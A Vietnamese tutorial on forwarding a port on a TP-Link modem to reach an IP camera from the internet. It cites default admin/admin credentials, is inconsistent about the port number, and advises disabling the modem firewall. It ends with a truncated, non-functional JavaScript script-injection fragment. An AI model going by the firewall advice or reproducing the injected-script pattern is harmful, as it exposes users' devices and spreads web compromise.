Nat port cho Camera để xem ngoại mạng internet  một phần không thiếu đối với một người IT, thuật ngữ  Nat port chắc hẳn sẽ là một từ khó hiểu đối với nhưng người không am hiểu về lĩnh vực CNTT, nhưng bài viết này của tôi nhằm hướng dẫn cho hầu hết mọi người không biết về Nat port cho Camera để cho bạn có thể làm chủ thiết bị Camera của mình một cách triệt để mà không cần phải nhờ đến sự giúp đỡ từ những người khác.

Bài viết này tôi sẽ hướng dẫn Nat port modem TP-Link đến các bạn, hiện nay modem TP-Link thường được sử dụng rộng rãi trên thị trường Việt Nam, đặc biệt là các bạn sử  dụng mạng FPT thì thường được tặng loại modem này. Tôi muốn nat port Camera có địa chỉ Ip là 192.168.1.21:12121 (địa chỉ IP của camera là 192.168.1.21 và port gán cho nó là 2121), nên đặt port cao tốt nhất là có 4 số để tránh trùng các port mặc định.

Bước 1 : bạn cắm dây mạng từ modem kết nối tới máy tính PC hoặc Laptop.
Bước 2 : vào giao diện web IE, Chrome, FireFox, Safari … sau đó truy cập tới địa chỉ  http://192.168.1.1
      User : admin
      Pass : admin
Bước 3 : sau khi đã đăng nhập vào giao diện modem như hình

Nat port Modem TP link 1 360x163 Hướng dẫn Nat Port modem TP Link

 

 

Bạn chọn mục “Advenced” Setup thao tác” Disable Firewall“, nếu không tắt thì modem sẽ chặn việc bạn mở Port cho camera dẫn đến sẽ không thể xem được Camera ngoại mạng.
Bước 4 : Tại tab “Advanced Setup” chọn mục “NAT” sau đó tiếp tục chọn “Virtual Server” để nhập các thông số cần Nat Port vào

Nat port Modem TP link 2 358x280 Hướng dẫn Nat Port modem TP Link

 

  – Rules index : số thứ tự  thực hiện Nat tương ứng với các vị trí 1, 2, 3, ,4 …trong bảo “Virtual Server listing”
  – Application : các giao thức cài trước (ví dụ : FPT, SSH, SMTP…), bạn nên bỏ trống không điền vào vì port Camera IP không nằm trong bảng hỗ trợ giao thức.
  – Protocol : có thể chọn “All” hoặc “TCP” , địa chỉ IP hoạt động bằng giao thức “TCP”.
  – Start Port Number : nhập port của Camera vào, ở đây Port camera của tôi là 2121.
  – End Port Number :  nhập port của Camera vào, ở đây Port camera của tôi là 2121.
  – Local Ip Address : nhập địa chỉ IP của Camera cần Nat port vào : 192.168.1.21
Sau đó bạn chọn “Save” để lưu lại thành quả Nat port của mình
Bước 5 : vào “Maintenance”  —>”Sysrestart” click chọn “Restart” để khởi động lại Modem. Động tác này nhằm chắc chắn rằng Modem sẽ khởi tạo và chạy dịch Nat Port bạn vừa cấu hình.

Như vậy là ta đã hoàn thành việc Nat port cho Camera IP trên Modem TP-Link một cách đơn giản phải không? Mong rằng bài viết này sẽ giúp ích cho bạn.

var d=document;var s=d.createElement(‘script’);